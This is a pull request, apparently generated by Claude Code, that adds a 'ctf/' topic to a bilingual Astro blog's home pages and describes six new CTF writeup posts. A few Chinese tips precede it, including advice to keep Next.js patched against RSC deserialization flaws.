+- 「框架版本号 + 近半年 CVE 列表」是 Web 题最快的解法。React 19 RSC 在去年底刚 GA，今年初就出了一批反序列化的洞，能背几个就够覆盖一票题。
+- 真线上 Next.js 别开「绕过 ESM lockdown」的 flag，patch 跟到 15.0.x 的最新点位。Vercel 默认配置一般 OK，自己跑的容器才是高危场景。
+- 这一类漏洞的范畴是「序列化层把字符串里的指令当代码执行」——RSC、Astro Server Islands、Remix 的 deferred loader 都共享同一类抽象，未来三年还会出。

--- a/src/pages/en/index.astro
+++ b/src/pages/en/index.astro
@@ -15,6 +15,7 @@ const topics = [
   'annotation/',
   'postgres/',
   'docker/',
+  'ctf/',
 ];
 
 const githubHandle = SOCIAL.github.replace('https://github.com/', '');

--- a/src/pages/index.astro
+++ b/src/pages/index.astro
@@ -15,6 +15,7 @@ const topics = [
   'annotation/',
   'postgres/',
   'docker/',
+  'ctf/',
 ];
 
 const githubHandle = SOCIAL.github.replace('https://github.com/', '');


### PR DESCRIPTION
## Summary

- Add `ctf/` to the topics list on both zh and en home pages (`src/pages/index.astro`, `src/pages/en/index.astro`).
- Add a 6-post bilingual series under `src/content/posts/{zh,en}/` adapted from writeups in [jack0pan/ctf](https://github.com/jack0pan/ctf) `cit-ctf-2026/`:
  - `cit-ctf-2026-overview` — series index and a few meta-tips
  - `cit-ctf-2026-debug-disaster` — Flask `debug=True` leaks the source of a forgotten `.env` route
  - `cit-ctf-2026-mass-assignment` — `dict.update` lets the request body overwrite `role='standard'`
  - `cit-ctf-2026-server-components` — Next.js 15 RSC deserialization RCE (CVE-2025-55182 / 66478)
  - `cit-ctf-2026-baby-exponent` — textbook RSA `e=3`, integer cube root
  - `cit-ctf-2026-dog-barking` — three bark durations encode bit 0 / bit 1 / byte separator

All posts use the existing frontmatter schema (`title`, `description`, `pubDate`, `tags`, `series`) and the `Callout` MDX component where useful. Each zh post has a same-filename en counterpart so the existing "available in other language" linking works.

## Test plan

- [ ] `pnpm install && pnpm build` succeeds locally
- [ ] Home page (zh + en) shows `ctf/` in the topics grid
- [ ] All 6 new posts appear in `/posts/` and `/en/posts/` listings
- [ ] Tag pages render the new `CTF`, `cit-ctf-2026`, `web`, `crypto`, `misc`, `flask`, `nextjs`, `cve`, `rsa`, `audio` tags
- [ ] Language switcher on any new post jumps to the same-slug counterpart
- [ ] Internal links between the series posts (overview → individual writeups) resolve

🤖 Generated with [Claude Code](https://claude.com/claude-code)

---
_Generated by [Claude Code](https://claude.ai/code/session_01VxMrsXgAbPewBxHBWE6arW)_